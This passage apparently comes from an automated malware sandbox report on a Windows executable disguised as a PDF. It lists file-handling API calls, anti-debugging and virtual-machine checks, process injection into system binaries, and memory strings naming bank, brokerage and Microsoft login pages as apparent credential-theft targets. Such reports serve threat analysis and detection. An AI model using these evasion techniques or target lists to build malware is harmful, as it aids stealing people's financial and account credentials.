            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,6_2_004339B6
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,6_2_0045CAFA
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00431A86
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,6_2_0044BD27
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045DE8F FindFirstFileW,FindClose,6_2_0045DE8F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0044BF8B
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BAC980 FindFirstFileW,FindNextFileW,FindClose,12_2_02BAC980
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,6_2_0040E500
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CDYNVMware20,11696492231p
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20
            Source: 635gG211.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 635gG211.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,1169649
            Source: 635gG211.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 635gG211.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 635gG211.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nge Transaction PasswordVMware20,11696492231^
            Source: 635gG211.12.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,116C
            Source: 635gG211.12.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 635gG211.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3157755641.00000000008EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
            Source: 635gG211.12.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 635gG211.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,116
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20,11696492231j
            Source: 635gG211.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 635gG211.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 635gG211.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 635gG211.12.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 635gG211.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 635gG211.12.drBinary or memory string: discord.comVMware20,11696492231f
            Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2088257723.00000193E0A4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 635gG211.12.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 635gG211.12.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 635gG211.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 635gG211.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 635gG211.12.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 635gG211.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231[
            Source: 635gG211.12.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Transaction PasswordVMware20,11696492231}
            Source: 635gG211.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 635gG211.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocklistVMware20,11696492231
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware
            Source: 635gG211.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 635gG211.12.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 635gG211.12.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 635gG211.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 635gG211.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 635gG211.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeAPI call chain: ExitProcess graph end nodegraph_6-86953
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367096E rdtsc 9_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00417993 LdrLoadDll,9_2_00417993
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045A370 BlockInput,6_2_0045A370
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,6_2_0040D590
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0040EBD0 LoadLibraryA,GetProcAddress,6_2_0040EBD0
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_04002558 mov eax, dword ptr fs:[00000030h]6_2_04002558
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_040025B8 mov eax, dword ptr fs:[00000030h]6_2_040025B8
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_04004700 mov eax, dword ptr fs:[00000030h]6_2_04004700
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_04005D60 mov eax, dword ptr fs:[00000030h]6_2_04005D60
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_04005DC0 mov eax, dword ptr fs:[00000030h]6_2_04005DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D437C mov eax, dword ptr fs:[00000030h]9_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h]9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov ecx, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B035C mov eax, dword ptr fs:[00000030h]9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FA352 mov eax, dword ptr fs:[00000030h]9_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D8350 mov ecx, dword ptr fs:[00000030h]9_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370634F mov eax, dword ptr fs:[00000030h]9_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03708324 mov eax, dword ptr fs:[00000030h]9_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03708324 mov ecx, dword ptr fs:[00000030h]9_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03708324 mov eax, dword ptr fs:[00000030h]9_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03708324 mov eax, dword ptr fs:[00000030h]9_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h]9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h]9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h]9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C310 mov ecx, dword ptr fs:[00000030h]9_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03650310 mov ecx, dword ptr fs:[00000030h]9_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h]9_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h]9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h]9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h]9_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036663FF mov eax, dword ptr fs:[00000030h]9_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EC3CD mov eax, dword ptr fs:[00000030h]9_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h]9_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h]9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h]9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h]9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h]9_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B63C0 mov eax, dword ptr fs:[00000030h]9_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h]9_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h]9_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE3DB mov ecx, dword ptr fs:[00000030h]9_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h]9_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D43D4 mov eax, dword ptr fs:[00000030h]9_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D43D4 mov eax, dword ptr fs:[00000030h]9_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h]9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h]9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h]9_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365438F mov eax, dword ptr fs:[00000030h]9_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365438F mov eax, dword ptr fs:[00000030h]9_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628397 mov eax, dword ptr fs:[00000030h]9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628397 mov eax, dword ptr fs:[00000030h]9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628397 mov eax, dword ptr fs:[00000030h]9_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634260 mov eax, dword ptr fs:[00000030h]9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634260 mov eax, dword ptr fs:[00000030h]9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634260 mov eax, dword ptr fs:[00000030h]9_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362826B mov eax, dword ptr fs:[00000030h]9_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h]9_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B8243 mov eax, dword ptr fs:[00000030h]9_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B8243 mov ecx, dword ptr fs:[00000030h]9_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370625D mov eax, dword ptr fs:[00000030h]9_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A250 mov eax, dword ptr fs:[00000030h]9_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636259 mov eax, dword ptr fs:[00000030h]9_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EA250 mov eax, dword ptr fs:[00000030h]9_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EA250 mov eax, dword ptr fs:[00000030h]9_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362823B mov eax, dword ptr fs:[00000030h]9_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037062D6 mov eax, dword ptr fs:[00000030h]9_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h]9_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h]9_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov ecx, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h]9_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h]9_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704164 mov eax, dword ptr fs:[00000030h]9_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704164 mov eax, dword ptr fs:[00000030h]9_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov ecx, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C156 mov eax, dword ptr fs:[00000030h]9_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C8158 mov eax, dword ptr fs:[00000030h]9_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636154 mov eax, dword ptr fs:[00000030h]9_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636154 mov eax, dword ptr fs:[00000030h]9_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660124 mov eax, dword ptr fs:[00000030h]9_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h]9_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov ecx, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F0115 mov eax, dword ptr fs:[00000030h]9_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037061E5 mov eax, dword ptr fs:[00000030h]9_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036601F8 mov eax, dword ptr fs:[00000030h]9_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h]9_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h]9_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h]9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h]9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h]9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h]9_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03670185 mov eax, dword ptr fs:[00000030h]9_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h]9_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h]9_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D4180 mov eax, dword ptr fs:[00000030h]9_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D4180 mov eax, dword ptr fs:[00000030h]9_2_036D4180
